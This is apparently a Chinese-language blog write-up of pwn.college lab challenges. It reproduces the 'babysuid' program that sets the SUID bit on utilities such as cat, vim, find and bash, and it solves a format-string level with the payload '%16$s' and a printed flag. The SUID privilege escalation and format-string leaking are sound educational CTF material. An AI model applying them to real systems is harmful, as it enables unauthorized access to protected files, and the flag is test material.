Optional Refreshers
Program Misuse
(本系列用的都是同一个程序babysuid)
level 1 ~ level 6
Lets you directly read the flag!
level 1:
挑战目录中存在以下文件:
.config:
这个配置文件用处不大,就是用来定义第几个关卡而已,每个关卡都有自己对应的编号。
babysuid源码:
#!/opt/pwn.college/python
import shutil
import socket
import sys
import os
CATEGORIZED_CHALS = [
[
"exposes you to very simple programs that let you directly read the flag",
[ "cat", "more", "less", "tail", "head", "sort" ]
],
[
"shows you that an over-privileged editor is a very powerful tool, indeed",
[ "vim", "emacs", "nano" ]
],
[
"require you to understand their output to derive the flag from it",
[ "rev", "od", "hd", "xxd", "base32", "base64", "split" ]
],
[
"force you to understand different archive formats",
[ "gzip", "bzip2", "zip", "tar", "ar", "cpio", "genisoimage" ]
],
[
"will enable you to read flags by making them execute other commands",
[ "env", "find", "make", "nice", "timeout", "stdbuf", "setarch", "watch", "socat" ]
],
[
"will require some light programming to read the flag.",
[ "whiptail", "awk", "sed", "ed" ]
],
[
"let you get the flag by doing tricks with permissions",
[ "chown", "chmod", "cp", "mv" ]
],
[
"let you read the flag because they let you program anything",
[ "perl", "python", "ruby", "bash" ]
],
[
"just straight up weren't designed to let you read files",
[ "date", "dmesg", "wc", "gcc", "as", "wget" ]
],
# todo: consider custom stuff that's abusable via path and such for the future
[
"show you how dangerous it is to allow users to load their own code as plugins into the program (but figuring out how is the hard part!)",
[ "ssh-keygen" ]
]
]
ALL_CHALS = [ (c,b) for c,bl in CATEGORIZED_CHALS for b in bl ]
with open("/challenge/.config") as f:
level = int(f.read())
concept, utility = ALL_CHALS[level - 1]
print(f"""
Welcome to {sys.argv[0]} (level {level})!
This challenge is part of a series of programs that
{concept}.
I am setting the SUID bit on the {utility} program (in your PATH at
/challenge/bin/{utility}.) Try to use it to read the flag!
IMPORTANT: make sure to run me (/challenge/babysuid) every time that you
restart this challenge container to make sure that I set the SUID bit!
""".strip())
if not os.path.exists("/challenge/bin"):
os.makedirs("/challenge/bin")
if not os.path.isfile(f"/challenge/bin/{utility}"):
assert shutil.copy2(shutil.which(utility), f"/challenge/bin/{utility}")
os.chmod(f"/challenge/bin/{utility}", 0o4755)
注意运行babysuid后才会生成漏洞程序:
描述中告诉我们为该目录下的cat设置了suid,可以直接用这个cat读取根目录的flag(并且cat被设置到了环境变量替换了原来系统中默认的),我们也发现flag文件设置为仅所有者root用户可读:
所以我们可以利用设置了suid的cat临时使用所有者root的权限来实现提权读取flag:
level 2:
同样还是与之前相似的文件,只不过把漏洞程序换成了more:
查看命令使用用法,选择-p选项清屏并输出文件内容:
level 3:
同样还是与之前相似的文件,只不过把漏洞程序换成了less:
直接执行less /flag:
less也可以直接读取文件,只不过是以另一种类似分页的形式展示
level 4:
同样还是与之前相似的文件,只不过把漏洞程序换成了tail:
tail也可以直接读取文件,并显示文件的最前面几行
level 5:
同样还是与之前相似的文件,只不过把漏洞程序换成了head:
不加任何参数,直接读取文件前十行:
level 6:
同样还是与之前相似的文件,只不过把漏洞程序换成了sort:
虽然sort是用来给文本按行等规则排序的,但它和上述命令一样同时能够读取文件内容:
level 7 ~ level 9
Shows you that an over-privileged editor is a very powerful tool!
level 7:
同样还是与之前相似的文件,只不过把漏洞程序换成了vim编辑器:
level 8:
同样还是与之前相似的文件,只不过把漏洞程序换成了emacs编辑器:
level 9:
同样还是与之前相似的文件,只不过把漏洞程序换成了nano编辑器:
level 10 ~ level 16
Requires you to understand their output to derive the flag from it!
Software Exploitation
Format String Exploits
Exploiting format string vulnerabilities is like a locksmith using a special set of tools to subtly manipulate the inner workings of a lock. It involves delicately inserting custom-crafted sequences into a program's output functions, much like a skilled safecracker tuning into the faint clicks of a safe's mechanism. Each carefully chosen character or specifier in the format string acts like a precise tweak to the internal gears, potentially revealing hidden information or granting control over the system's memory. This technique is a blend of art and science, requiring a deep understanding of the software's architecture and a creative approach to bending its functionalities beyond their intended limits. It's a thrilling intellectual puzzle, unlocking the secrets of a program from the inside out.
利用格式字符串漏洞就像锁匠使用一组特殊的工具来巧妙地操纵锁的内部工作原理。它涉及将定制的序列巧妙地插入程序的输出函数中,就像一个熟练的保险箱破解者调整保险箱机制的微弱咔嗒声一样。格式字符串中每个精心选择的字符或说明符都像是对内部齿轮的精确调整,可能会揭示隐藏的信息或授予对系统内存的控制权。这种技术是艺术与科学的融合,需要对软件的架构有深刻的理解,并需要创造性地将其功能超出预期限制。这是一个惊心动魄的智力谜题,从内到外解开程序的秘密。
Level1.0
┌──(root㉿hunter)-[/media/…/CTF靶场素材/pwncollege/SoftwareExploitation/FormatStringExploits]
└─# checksec babyfmt_level1.0
[*] '/media/cvestone/0F00-E8EA/CTF靶场素材/pwncollege/SoftwareExploitation/FormatStringExploits/babyfmt_level1.0'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
hacker@format-string-exploits~level1-0:/challenge$ ./babyfmt_level1.0
###
### Welcome to ./babyfmt_level1.0!
###
This challenge reads in some bytes, calls printf on that string, and allows you to perform
a format string attack. Through this series of challenges, you will become painfully familiar
with the concept of Format String Attacks!
This challenge allows you to make a 256-sized format string.
There is a 15-character uppercase secret password hidden on the stack!
If you find it, you will be given the flag!
The secret password is located at 0x7fffe28e6a80 and the stack pointer is located at 0x7fffe28e6a30.
The difference between these addresses is: 10 (80 / 8).
This means, before the printf, the arguments to the format string will look something like:
0x7fffe28e6a80: [SECRET_PASSWORD]
0x7fffe28e6a78: [?]
0x7fffe28e6a70: [?]
0x7fffe28e6a68: [?]
0x7fffe28e6a60: [?]
0x7fffe28e6a58: [?]
0x7fffe28e6a50: [?]
0x7fffe28e6a48: [?]
0x7fffe28e6a40: [?]
0x7fffe28e6a38: [?]
0x7fffe28e6a30: [?]
R9: [?]
R8: [?]
RCX: [?]
RDX: [?]
RSI: [?]
RDI: [FORMAT_STRING]
I will now read up to 256 bytes. Send your data!
%16$s
Received 6 bytes!
I will now call printf on your data!
QRVQRXOSWCNGMRU
What is the secret password?
QRVQRXOSWCNGMRU
Correct Password!
pwn.college{MZf8AKQz8RaRnQQpMA92YkGMqNz.dZTM0MDL0kDN1QzW}
### Goodbye!
分析:题目告诉我们密码位于0x7fffe28e6a80,并且栈顶指针在 0x7fffe28e6a30,还告诉我们两者之间相隔10个栈位置,由此可以直接泄漏,因为这是x64架构,因此栈顶指针为格式化字符串函数的第6个参数位,因此密码位于第6+10个参数位,所以我们用%16$s泄漏出了密码
Comments NOTHING